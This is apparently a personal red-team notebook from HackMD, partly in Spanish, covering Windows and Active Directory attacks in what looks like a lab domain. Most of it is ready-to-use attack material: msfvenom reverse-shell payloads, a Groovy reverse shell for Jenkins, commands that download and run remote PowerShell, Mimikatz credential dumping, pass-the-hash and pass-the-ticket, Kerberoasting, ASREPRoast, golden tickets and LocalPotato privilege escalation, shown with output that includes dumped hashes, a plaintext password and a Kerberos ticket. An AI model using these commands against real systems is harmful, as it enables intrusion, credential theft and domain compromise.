RED TEAM AD - HackMD

# RED TEAM AD # SIMPLE WINDOWS HACKING - Acceso perimetrial - Exfiltrar hashes NTLM - hashcat - Elevaciones de privilegios: - unquoted path - dll hijack - simple persistence - Bypasses - AMSI BYPASS - Disable Execute Policy - Disable AV - SAM - Directorio Activo: - AD: AD enumeration - AD: LSASS.EXE - AD: pass the hash - AD: pass the ticket - AD: DCSync ___ ________ https://www.offsec.com/metasploit-unleashed/windows-post-gather-modules/ Step 3: Use the shown module by following the command “use post/multi/manage/shell_to_meterpreter” or by simply typing “use 0”. Any of the two commands will work. ___ Executable with Windows cmd msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe Windows DLL with Windows cmd msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll post/windows/manage/migrate This module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process. dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup" Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup" https://github.com/ParrotSec/mimikatz - https://raw.githubusercontent.com/saisathvik1/OSCP-Cheatsheet/main/README.md ## File Transfers - Downloading on Windows ```bash powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\\temp\\<FILE> iwr -uri http://lhost/file -Outfile file certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE> copy \\kali\share\file . ``` - Downloading on Linux ```bash wget http://lhost/file curl http://<LHOST>/<FILE> > <OUTPUT_FILE> ``` ### Windows to Kali ```bash kali> impacket-smbserver -smb2support <sharename> . win> copy file \\KaliIP\sharename ``` ## Port Scanning ```bash #use -Pn option if you're getting nothing in scan nmap -sC -sV <IP> -v #Basic scan nmap -T4 -A -p- <IP> -v #complete scan sudo nmap -sV -p 443 --script "vuln" 192.168.50.124 #running vuln category scripts #NSE updatedb locate .nse | grep <name> sudo nmap --script="name" <IP> #here we can specify other options like specific ports...etc Test-NetConnection -Port <port> <IP> #powershell utility 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null #automating port scan of first 1024 ports in powershell ``` ## FTP enumeration ```bash ftp <IP> #login if you have relevant creds or based on nmpa scan find out whether this has anonymous login or not, then loginwith Anonymous:password put <file> #uploading file get <file> #downloading file #NSE locate .nse | grep ftp nmap -p21 --script=<name> <IP> #bruteforce hydra -L users.txt -P passwords.txt <IP> ftp #'-L' for usernames list, '-l' for username and viceversa #check for vulnerabilities associated with the version identified. ``` ## SSH enumeration ```bash #Login ssh uname@IP #enter password in the prompt #id_rsa or id_ecdsa file chmod 600 id_rsa/id_ecdsa ssh uname@IP -i id_rsa/id_ecdsa #if it still asks for password, crack them using John #cracking id_rsa or id_ecdsa ssh2john id_ecdsa(or)id_rsa > hash john --wordlist=/home/sathvik/Wordlists/rockyou.txt hash #bruteforce hydra -l uname -P passwords.txt <IP> ssh #'-L' for usernames list, '-l' for username and viceversa #check for vulnerabilities associated with the version identified. ``` ## SMB enumeration ```bash sudo nbtscan -r 192.168.50.0/24 #IP or range can be provided #NSE scripts can be used locate .nse | grep smb nmap -p445 --script="name" $IP #In windows we can view like this net view \\<computername/IP> /all #crackmapexec crackmapexec smb <IP/range> crackmapexec smb 192.168.1.100 -u username -p password crackmapexec smb 192.168.1.100 -u username -p password --shares #lists available shares crackmapexec smb 192.168.1.100 -u username -p password --users #lists users crackmapexec smb 192.168.1.100 -u username -p password --all #all information crackmapexec smb 192.168.1.100 -u username -p password -p 445 --shares #specific port crackmapexec smb 192.168.1.100 -u username -p password -d mydomain --shares #specific domain #Inplace of username and password, we can include usernames.txt and passwords.txt for password-spraying or bruteforcing. # Smbclient smbclient -L //IP #or try with 4 /'s smbclient //server/share smbclient //server/share -U <username> mbclient //server/share -U domain/username #SMBmap smbmap -H <target_ip> smbmap -H <target_ip> -u <username> -p <password> smbmap -H <target_ip> -u <username> -p <password> -d <domain> smbmap -H <target_ip> -u <username> -p <password> -r <share_name> #Within SMB session put <file> #to upload file get <file> #to download file ``` - Downloading shares made easy - if the folder consists of several files, they all be downloading by this. ```bash mask "" recurse ON prompt OFF mget * ``` ## HTTP/S enumeration - View source-code and identify any hidden content. If some image looks suspicious download and try to find hidden data in it. - Identify the version or CMS and check for active exploits. This can be done using Nmap and Wappalyzer. - check /robots.txt folder - Look for the hostname and add the relevant one to `/etc/hosts` file. - Directory and file discovery - Obtain any hidden files which may contain juicy information ```bash dirbuster gobuster dir -u http://example.com -w /path/to/wordlist.txt python3 dirsearch.py -u http://example.com -w /path/to/wordlist.txt ``` - Vulnerability Scanning using nikto: `nikto -h <url>` - SSL certificate inspection, this may reveal information like subdomains, usernames…etc - Default credentials, Identify the CMS or service ans check for default credentials and test them out. - Bruteforce ```bash hydra -L users.txt -P password.txt <IP or domain> http-{post/get}-form "/path:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V # Use https-post-form mode for https, post or get can be obtained from Burpsuite. Also do capture the response for detailed info. #Bruteforce can also be done by Burpsuite but it's slow, prefer Hydra! ``` - if `cgi-bin` is present then do further fuzzing and obtain files like .sh or .pl - Check if other services like FTP/SMB or anyothers which has upload privileges are getting reflected on web. - API - Fuzz further and it can reveal some sensitive information ```bash #identifying endpoints using gobuster gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern #pattern can be like {GOBUSTER}/v1 here v1 is just for example, it can be anything #obtaining info using curl curl -i http://192.168.50.16:5002/users/v1 ``` - If there is any Input field check for **Remote Code execution** or **SQL Injection** - Check the URL, whether we can leverage **Local or Remote File Inclusion**. - Also check if there’s any file upload utility(also obtain the location it’s getting reflected) ### Wordpress ```bash # basic usage wpscan --url "target" --verbose # enumerate vulnerable plugins, users, vulrenable themes, timthumbs wpscan --url "target" --enumerate vp,u,vt,tt --follow-redirection --verbose --log target.log # Add Wpscan API to get the details of vulnerabilties. ``` ### Drupal ```bash droopescan scan drupal -u http://site ``` ### Joomla ```bash droopescan scan joomla --url http://site sudo python3 joomla-brute.py -u http://site/ -w passwords.txt -usr username #https://github.com/ajnik/joomla-bruteforce ``` ## DNS enumeration ```bash host www.megacorpone.com host -t mx megacorpone.com host -t txt megacorpone.com for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found" #bash bruteforcer to find domain name dnsrecon -d megacorpone.com -t std #standard recon dnsrecon -d megacorpone.com -D ~/list.txt -t brt #bruteforce, hence we provided list dnsenum megacorpone.com nslookup mail.megacorptwo.com nslookup -type=TXT info.megacorptwo.com 192.168.50.151 #we're querying with a specific IP ``` ## SMTP enumeration ```bash nc -nv <IP> 25 #Version Detection smtp-user-enum -M VRFY -U username.txt -t <IP> # -M means mode, it can be RCPT, VRFY, EXPN #Sending email with valid credentials, the below is an example for Phishing mail attack sudo swaks -t user1@test.com -t user2@test.com --from user3@test.com --server <mailserver-IP> --body @body.txt --header "Test" --suppress-data -ap ``` ## LDAP Enumeration ```bash ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>" #CN name describes the info w're collecting ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>" ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>" #windapsearch.py #for computers python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --computers #for groups python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --groups #for users python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --da #for privileged users python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --privileged-users ``` ## NFS Enumeration ```bash nmap -sV --script=nfs-showmount <IP> showmount -e <IP> ``` ## SNMP Enumeration ```bash snmpcheck -t <IP> -c public snmpwalk -c public -v1 -t 10 <IP> snmpenum -t <IP> ``` ## RPC Enumeration ```bash rpcclient -U=user $DCIP rpcclient -U="" $DCIP #Anonymous login ##Commands within in RPCclient srvinfo enumdomusers #users enumpriv #like "whoami /priv" queryuser <user> #detailed user info getuserdompwinfo <RID> #password policy, get user-RID from previous command lookupnames <user> #SID of specified user createdomuser <username> #Creating a user deletedomuser <username> enumdomains enumdomgroups querygroup <group-RID> #get rid from previous command querydispinfo #description of all users netshareenum #Share enumeration, this only comesup if the current user we're logged in has permissions netshareenumall lsaenumsid #SID of all users ``` ### Groovy reverse-shell - For Jenkins ```bash String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` ## DUMP SAM ``` On Windows: reg save HKLM\sam sam reg save HKLM\system system Send it into a zip to your KALI (Attacker machine). On KALI: # samdump2 -d SYSTEM SAM ``` ![](https://hackmd.io/_uploads/rJZAGmYH3.png) ![](https://hackmd.io/_uploads/HJ_-mLtr3.png) ![](https://hackmd.io/_uploads/HkiX5PKS3.png) https://www.hackingarticles.in/credential-dumping-sam/ ## DUMP LSASS Script en powershell para realizar "DUMPS" de un proceso. (Fichero de volcado) https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1 ![](https://hackmd.io/_uploads/SJh8zMtH2.png) ![](https://hackmd.io/_uploads/HJ1xNzFS3.png) #### EXTRA: https://github.com/outflanknl/Dumpert https://secybr.com/posts/dumping-lsass-without-mimikatz/ ## Password-Hash Cracking *Hash Analyzer*: [https://www.tunnelsup.com/hash-analyzer/](https://www.tunnelsup.com/hash-analyzer/) ### fcrackzip ```bash fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <FILE>.zip #Cracking zip files ``` ### John > [https://github.com/openwall/john/tree/bleeding-jumbo/run](https://github.com/openwall/john/tree/bleeding-jumbo/run) > ```bash ssh2john.py id_rsa > hash #Convert the obtained hash to John format(above link) john hashfile --wordlist=rockyou.txt ``` ### Hashcat > [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) > ```bash #Obtain the Hash module number hashcat -m <number> hash wordlists.txt --force ``` ## mimital lsadump::lsa /patch Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"' **Adminsitrador NT Hash: fc19a68b44372b3bcf0297e08a28fda8** ![](https://hackmd.io/_uploads/B153FMtS2.png) ![](https://hackmd.io/_uploads/Hkg1cMtS3.png) ``` Authentication Id : 0 ; 18444321 (00000000:01197021) Session : CachedInteractive from 1 User Name : Administrador Domain : BLEACH Logon Server : PRINCIPAL-BLEACH Logon Time : 22/05/2023 18:11:36 SID : S-1-5-21-3777977817-1859332824-490154379-500 msv : [00000003] Primary * Username : Administrador * Domain : BLEACH * NTLM : fc19a68b44372b3bcf0297e08a28fda8 * SHA1 : a23a9ebee5923c7860e21a1ef6cf053cf6885c00 * DPAPI : 380f529916e7310ff45ab4ab0e99c80e tspkg : wdigest : * Username : Administrador * Domain : BLEACH * Password : (null) kerberos : * Username : Administrador * Domain : BLEACH.LOCAL * Password : Hack1T995 ssp : KO credman : ``` ![](https://hackmd.io/_uploads/B1asHQtrh.png) https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections https://redteamrecipe.com/64-Methods-For-Execute-Mimikatz/ https://systemweakness.com/bypass-mimikatz-using-process-injection-technique-6d2a8415fcd6 ## Mimikatz ```powershell privilege::debug sekurlsa::logonpasswords #hashes and plaintext passwords lsadump::sam lsadump::lsa /patch #both these dump SAM #OneLiner .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" ``` ## Ligolo-ng ```bash #Creating interface and starting it. sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up #Kali machine - Attacker machine ./proxy -laddr <LHOST>:9001 -selfcert #windows or linux machine - compromised machine ./agent -connect <LHOST>:9001 -ignore-cert #In Ligolo-ng console session #select host ifconfig #Notedown the internal network's subnet start #after adding relevent subnet to ligolo interface #Adding subnet to ligolo interface - Kali linux sudo ip r add <subnet> dev ligolo ``` #### BLIND PASS THE HASH WITH PS. ``` PS C:\Users\jquerito\Downloads\impacket> IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1'); PS C:\Users\jquerito\Downloads\impacket> Invoke-WMIExec -target PRINCIPAL-BLEACH -hash fc19a68b44372b3bcf0297e08a28fda8 -username Administrador -command "ping 10.0.9.7" [+] Command executed with process ID 5900 on PRINCIPAL-BLEACH ON KALI: sudo tcpdump -nni eth0 icmp ``` ![](https://hackmd.io/_uploads/rkSl4HFB3.png) ![](https://hackmd.io/_uploads/H1-d7HFSn.png) ## Token Impersonation - Command to check `whoami /priv` ```bash #Printspoofer PrintSpoofer.exe -i -c powershell.exe PrintSpoofer.exe -c "nc.exe <lhost> <lport> -e cmd" #RoguePotato RoguePotato.exe -r <AttackerIP> -e "shell.exe" -l 9999 #GodPotato GodPotato.exe -cmd "cmd /c whoami" GodPotato.exe -cmd "shell.exe" #JuicyPotatoNG JuicyPotatoNG.exe -t * -p "shell.exe" -a #SharpEfsPotato SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" #writes whoami command to w.log file ``` ### TO GET A REVERSE SHELL ```evil-winrm -i 10.0.9.5 -u Administrador -H fc19a68b44372b3bcf0297e08a28fda8``` ![](https://hackmd.io/_uploads/HkmERBKS2.png) ![](https://hackmd.io/_uploads/B1atdrYB3.png) # RUBEUS ![](https://hackmd.io/_uploads/SJAvF8KS3.png) ![](https://hackmd.io/_uploads/BkytYLYSn.png) ![](https://hackmd.io/_uploads/SJ-oKIKSn.png) #### BUT... ![](https://hackmd.io/_uploads/Skh55gtSn.png) https://github.com/byt3bl33d3r/pth-toolkit LOL ![](https://hackmd.io/_uploads/ryhjLHKBn.png) ![](https://hackmd.io/_uploads/rJiQXLYB3.png) IMPERSONATION: ![](https://hackmd.io/_uploads/Sk7mfOFSh.png) ``` iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast ``` KERBEROAST::: ![](https://hackmd.io/_uploads/S1dd9DFS2.png) ![](https://hackmd.io/_uploads/BkxD1OtBn.png) ![](https://hackmd.io/_uploads/r11NVOtB3.png) ________________________ # ARE Y WINING SON? ### local potatoe thm esta vulnerabilidad permite a un usuario normal obtener el privilegio de "Impersonate", que puede ser utilizado para realizar acciones privilegiadas. La técnica de escalada de privilegios local conocida como "LocalPotato" se basa en una vulnerabilidad en sistemas operativos Windows que permite a un usuario con privilegios limitados elevar sus privilegios a nivel de administrador. La vulnerabilidad específica que aprovecha LocalPotato es conocida como "SeImpersonatePrivilege". Esta vulnerabilidad permite que un usuario normal obtenga el privilegio de "Impersonate" en Windows, que es un privilegio de alto nivel que permite al usuario realizar acciones privilegiadas, como ejecutar comandos con privilegios elevados. ![](https://hackmd.io/_uploads/rJwnOn0S3.png) ![](https://hackmd.io/_uploads/HyRSO60B3.png) ![](https://hackmd.io/_uploads/Hk34K6AB3.png) ![](https://hackmd.io/_uploads/ryY_t3RH3.png) ![](https://hackmd.io/_uploads/rJFEVp0B2.png) ![](https://hackmd.io/_uploads/ryx1X6RB2.png) c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add ``` C:\Users\user\Desktop>move "C:\tools\LPE via StorSvc\RpcClient\x64\Debug\RpcClient.exe" . 1 file(s) moved. C:\Users\user\Desktop>move "C:\tools\LPE via StorSvc\SprintCSP\x64\Debug\SprintCSP.dll" . Overwrite C:\Users\user\Desktop\SprintCSP.dll? (Yes/No/All): Yes 1 file(s) moved. C:\Users\user\Desktop> ____ C:\Users\user\Desktop>reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -v Path HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment Path REG_EXPAND_SZ %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\Amazon\cfn-bootstrap\ C:\Users\user\Desktop>LocalPotato.exe -i SprintCSP.dll -o \Windows\System32\SprintCSP.dll LocalPotato (aka CVE-2023-21746) by splinter_code & decoder_it [*] Objref Moniker Display Name = objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGAQAAAAAAAAAKirfTBVWTTryu0ycrVEdmAXwAANASEA3T1a0Mi6U3jSkAEwAHAEwAUAAAAAcAMQAwAC4AMQAwAC4AMQAzADgALgA0ADUAAAAAAAkA//8AAB4A//8AABAA//8AAAoA//8AABYA//8AAB8A//8AAA4A//8AAAAA: [*] Calling CoGetInstanceFromIStorage with CLSID:{854A20FB-2D44-457D-992F-EF13785D2B51} [*] Marshalling the IStorage object... IStorageTrigger written: 100 bytes [*] Received DCOM NTLM type 1 authentication from the privileged client [*] Connected to the SMB server with ip 127.0.0.1 and port 445 [+] SMB Client Auth Context swapped with SYSTEM [+] RPC Server Auth Context swapped with the Current User [*] Received DCOM NTLM type 3 authentication from the privileged client [+] SMB reflected DCOM authentication succeeded! [+] SMB Connect Tree: \\127.0.0.1\c$ success [+] SMB Create Request File: Windows\System32\SprintCSP.dll success [+] SMB Write Request file: Windows\System32\SprintCSP.dll success [+] SMB Close File success [+] SMB Tree Disconnect success ``` ![](https://hackmd.io/_uploads/HkRjFTAr2.png) ### kerberoasting https://ciberseguridad.com/amenzas/ataques-kerberoasting/#%C2%BFQue_son_los_ataques_de_Kerberoasting Los Service Principal Names (SPN) se utilizan para identificar de forma única cada instancia de un servicio de Windows. Para permitir la autenticación, Kerberos requiere que los SPN estén asociados con al menos un servicio. Los adversarios que posean un ticket de concesión de ticket (TGT) de Kerberos válido pueden solicitar uno o más tickets de servicio de concesión de ticket (TGS) de Kerberos para cualquier SPN de un controlador de dominio (DC)>. Este mismo ataque podría ejecutarse utilizando tickets de servicio capturados del tráfico de red. Los hashes crackeados pueden permitir la Persistencia, la Escalada de Privilegios y el Movimiento Lateral a través del acceso a Cuentas Válidas. Kerberoasting se aprovecha de cómo las cuentas de servicio aprovechan la autenticación Kerberos con Service Principal Names (SPNs). Kerberoasting nos permite descifrar las contraseñas de estas cuentas. Por> Get-NetUser | Where-Object {$_.servicePrincipalName} | fl get-adobject | Where-Object {$_.serviceprincipalname -ne $null -and $_.distinguishedname -like "*CN=Users*" -and $_.cn -ne "krbtgt"} # Kerberoast all users in Domain ![](https://hackmd.io/_uploads/HyqviRRS3.png) # All Users in OU .\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local # Specific users .\Rubeus.exe kerberoast /user:File_SVC ### El ASREPRoast es una técnica parecida a Kerberoasting que intenta crackear offline las contraseñas de los usuarios de servicio pero las de los que tienen el atributo DONT_REQ_PREAUTH, es decir, los que no se les requiere pre-autenticación en kerberos. Por supuesto, no se recomienda habilitar esto porque sin autenticación previa un atacante puede enviar directamente una solicitud ficticia de autenticación sin conocer las credenciales (mensaje KRB_AS_REQ). El KDC devolverá un TGT cifrado y el atacante puede hacerle fuerza bruta de forma offline. Al verificar los logs del KDC, no se verá nada excepto una única solicitud de TGT. https://www.hackplayers.com/2020/11/asreproast-o-as-rep-roasting.html https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 ``` # ASREP check on all domain Users (Requires valid domain credentials) python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$" # ASREP check on a list of domain user (Does not require domain credentials) python2 GetNPUsers.py <Domain> -usersfile <UserList> -dc-ip <IP> -format <John|Hashcat> | grep "$krb5asrep$" https://github.com/r3motecontrol/Ghostpack-CompiledBinaries # Extract from all domain accounts .\Rubeus.exe asreproast .\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt # Windows hashcat64.exe -m 18200 c:Hashes.txt rockyou.txt # Linux john --wordlist rockyou.txt Hashes.txt --format=krb5tgs hashcat -m 18200 -a 3 Hashes.txt rockyou ``` ![](https://hackmd.io/_uploads/r1x7A0AB3.png) ![](https://hackmd.io/_uploads/B1hYdRCS2.png) https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting ![](https://hackmd.io/_uploads/Hy8bz1JU3.png) ![](https://hackmd.io/_uploads/ByhJbyJI3.png) ![](https://hackmd.io/_uploads/r1RVz1JIh.png) PS C:\Users\jquerito\Downloads\mimikatz-master\mimikatz-master\x64> scp.exe .\kiribiris.zip kali@10.0.9.7:/home/kali/Documents/cosas/ kali@10.0.9.7's password: kiribiris.zip 100% 22KB 21.5KB/s 00:00 PS C:\Users\jquerito\Downloads\mimikatz-master\mimikatz-master\x64> ``` ┌──(kali㉿kali)-[~/Documents/cosas] └─$ python3 ../kerberoast/tgsrepcrack.py /home/kali/Documents/rockyou.txt kiribiris/3-40a10000-jquerito@mssql_svc\~mssqlserver.BLEACH.local-BLEACH.LOCAL.kirbi USE HASHCAT, IT'S HELLA FASTER!! ``` hashcat -m 13100 --force <TGSs_file> <passwords_file> https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/ https://www.hackingarticles.in/lateral-movement-pass-the-ticket-attack/ https://www.hackingarticles.in/lateral-movement-pass-the-ccache/ TOOLS TO TRY:: https://github.com/r4wd3r/Suborner https://github.com/silverfort-open-source/latma https://github.com/BeichenDream/GodPotato https://github.com/Accenture/Spartacus ## PASS THE TICKET ![](https://hackmd.io/_uploads/SJ9BqV_8h.png) https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket https://www.thehacker.recipes/ad/movement/kerberos/ptt PS> .\mimikatz.exe "kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt" "misc::cmd" exit ``` # lsadump::lsa /patch Rubeus.exe monitor /interval:1 EXPORTAR TICKETS # Using mimikatz sekurlsa::tickets /export # Using Rubeus ## Dump all tickets .\Rubeus dump [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) ## List all tickets .\Rubeus.exe triage ## Dump the interesting one by luid .\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>")) ``` root@kali:kerbrute# python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt --> rubeus.exe brute /password:Password@1 /noticket --> .\Rubeus.exe brute /users:users.txt /passwords:passwords.txt /domain:jurassic.park /outfile:jurassic_passwords.txt rubeus.exe changepw /targetuser:ignite.local\mufasa /ticket:doIFNDCC...bA== /new:Password@1!!! ![](https://hackmd.io/_uploads/BJksLJdUh.png) ![](https://hackmd.io/_uploads/HkRKgkdL3.png) ![](https://hackmd.io/_uploads/H1owrJdI2.png) ![](https://hackmd.io/_uploads/Hy0lIJuIh.png) ![](https://hackmd.io/_uploads/ryhNqJdIh.png) ``` [*] Current LUID : 0x16f441 UserName : jquerito Domain : BLEACH LogonId : 0x16f441 UserSID : S-1-5-21-3777977817-1859332824-490154379-1108 AuthenticationPackage : Kerberos LogonType : Interactive LogonTime : 02/06/2023 23:48:07 LogonServer : PRINCIPAL-BLEAC LogonServerDNSDomain : BLEACH.LOCAL UserPrincipalName : jquerito@BLEACH.local ServiceName : krbtgt/BLEACH.LOCAL Service m : BLEACH.LOCAL UserName : jquerito UserRealm : BLEACH.LOCAL StartTime : 02/06/2023 23:48:07 EndTime : 03/06/2023 9:48:07 RenewTill : 09/06/2023 23:48:07 Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : aes256_cts_hmac_sha1 Base64(key) : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA= Base64EncodedTicket : doIFSjCCBUagAwIBBaEDAgEWooIETzCCBEthggRHMIIEQ6ADAgEFoQ4bDEJMRUFDSC5MT0NBTKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMQkxFQUNILkxPQ0FMo4IEBzCCBAOgAwIBEqEDAgECooID9QSCA/FJZnQbwHjNZek/lrCb1/s8zG8ruurjnEATJNjLdnwqWCMK4nBKJIV+pqfE52QrxSMS/9jFdVYzQpnqrBMDNmclkX9lYdEPzpbOc4aHfG1gC/5D6itgCYqSBLpYabuZOjh5ssRcuPi6+7XYg/ZZB4yVPHPi3/pOkDSTac9Pv3CsAljUddLSv6OFSRigW3/eIvF3EHEv9f0V2/6avfBBlamPB6HuQHzc+9Pba3PfPlgmLs439upcRQTLaCdr2kvR7x/qCuQxP9lHxVgpGFnKXLULypu5qujsuVxqcxNQZ2+i5LdGKcMHhS3yHoHBvDilxSDHNLTS/r2bbCtrzYENyDscLeV8Kl3wBWIk0RdKZuTV+H7EQ8d6R7pN2PplPvmWgZgOaXG9mbn34dL7UO3l9F7I37xFArMXkEtKDgWsmAwhVo0oN6nlLvYE9v159TUFru8WQaCBuOt2tlCaCSGS8ZAKIVbRqP9KzOdqGEtnswRP3AA3T+7iBeu9bOGkWhCE9PBk3gNeTfXDRpAUi1y0jbzjuae071gVEhTgOES03hz/jKKnebHF5q4MWcFJOM1X5NP15ulGA1abx7lRwIrmrKksNSeS1O07ozjU0Bk302EHyGJUbHwBIPDdeVz9RI6RoK4B7OWwl6qQC0ocFQOZpbtvPUrhG1P6ENJT4Im6611FAAQssMnZM8VB5VTVD06aWj3u3WNe2RA7k8Q4L5ZWu3NjceeQ7McZhgN7cKTWmKunMsCRiDRPjCrgH7iKjwwcw97xBeBHBvhj8tc33YCeiPc7qqQEtVbxWrzEiGI5JOWXmInySR6snXnUiGuyOxO/q05sFgLy2xijBsH6SP7wKOeP1fALcgsSukaFEGU+aNCpNCtPotp/yINgTYPK3EWs7r6vx/ia6kubjqN+pk2WDGWInkMGK2zIG+QuQQk/NDcTh58vIgwh8YrykQtTpIbcjT0wWxJtih4ncse7Y9qRokUr/eyEqfhTpdfxe8DUsF2E1R5s7dKB4Fjp36CVFRSPyRJ895nJ3QuD80/1qzimZjK6e84Ue4pFJk6gNOO0JAM4X3xbo1Qpl6Guu3KE3KmPWA8pansM4OeNsoU4/2FzZVO6BCFJrFdAZqb7jhJniwQQ4IPbP1M6Yt09nyLAiYX/wcH8gYgwLeRoQvQWI2d4N3U2+ZnB8yLePd0IagQXaG2bN6S5zP0RWeaTW3O25ln0drDEErcVoFUSlfgZsNzT9IC8m/BR6hr2U3vldWtxtPKFYzsE9U7oEzrZlngK1ePsWj36r/l++DhAbimlo8pnYoMiUHoK5efHP1BpPa8ynpWno5IeCdwJMQqYV5sy5U/vYyQgo4HmMIHjoAMCAQCigdsEgdh9gdUwgdKggc8wgcwwgcmgKzApoAMCARKhIgQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChDhsMQkxFQUNILkxPQ0FMohUwE6ADAgEBoQwwChsIanF1ZXJpdG+jBwMFAEDhAAClERgPMjAyMzA2MDIyMTQ4MDdaphEYDzIwMjMwNjAzMDc0ODA3WqcRGA8yMDIzMDYwOTIxNDgwN1qoDhsMQkxFQUNILkxPQ0FMqSEwH6ADAgECoRgwFhsGa3JidGd0GwxCTEVBQ0guTE9DQUw= ``` _______________________________________________________________ ``` .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" # Windows -> UNIX ticketConverter.py $ticket.kirbi $ticket.ccache # UNIX -> Windows ticketConverter.py $ticket.ccache $ticket.kirbi # Linux cat ticket.b64 | base64 -d > ticket.kirbi # Mac cat ticket.b64 | base64 -D > ticket.kirbi # 